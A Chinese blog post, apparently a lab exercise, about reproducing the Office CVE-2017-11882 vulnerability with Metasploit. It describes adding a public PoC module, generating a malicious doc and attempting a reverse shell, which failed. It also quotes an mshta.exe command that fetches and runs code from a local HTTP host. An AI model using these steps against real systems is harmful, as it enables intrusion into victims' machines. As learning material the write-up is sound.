码迷,mamicode.com
首页 > 其他好文 > 详细

Office CVE-2017-11882复现

时间:2018-04-13 19:05:01      阅读:214      评论:0      收藏:0      [点我收藏+]

标签:office   cve-2017-11882   

继续练习metasploit的使用,这次复现的是11882这个漏洞,但是最后并没有成功(已经把我逼疯)。这里记录两个复现方式,希望有缘人能够为小女子解答最后不成功的原因,小女子感激不尽。


就不去介绍这个漏洞了,网上搜一大把的。下面直接放两个方式的截图以及简单讲解。
00X0利用网上的poc来复现
poc地址:https://www.cnblogs.com/i-honey/p/7885573.html
首先要把cve-2017-11882.rb文件复制到msf模块下
技术分享图片
然后打开README.md,按照提示进行恶意doc的生成,其中有一个是用来弹计算器的。我们直接生成恶意doc,注意这里的地址要换成你自己主机的地址。
技术分享图片
然后我们来使用我们添加的msf模块,设置参数,这里如果search不到新添加的模块可以使用:reload_all命令
技术分享图片
技术分享图片
然后运行,这里也显示失败的结果了。如果成功反弹shell输入sessions的时候会出现一个或者多个session。
技术分享图片
失败的原因我想和下面这个错误有关。当我在本地cmd下运行【mshta.exe "http://192.168.40.22:8080/abc " 的时候也是出现系统找不到指定文件的错误。
技术分享图片
00X01利用Metasploit自带exp
search模块,然后set参数,如图,当我在主机打开恶意doc时,直接出来下图内容,之前在网上看到一哥们说这是表示本机office没有漏洞,但是我利用弹计算器的测试doc能够成功弹出doc,说明本地office版本应该还是有漏洞的吧。
技术分享图片
朋友说是我主机windows系统的原因,他在他本地也不能反弹,但是他在他windows虚拟机里面就可以。我也是母鸡了~

Office CVE-2017-11882复现

标签:office   cve-2017-11882   

原文地址:http://blog.51cto.com/13539934/2103188

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!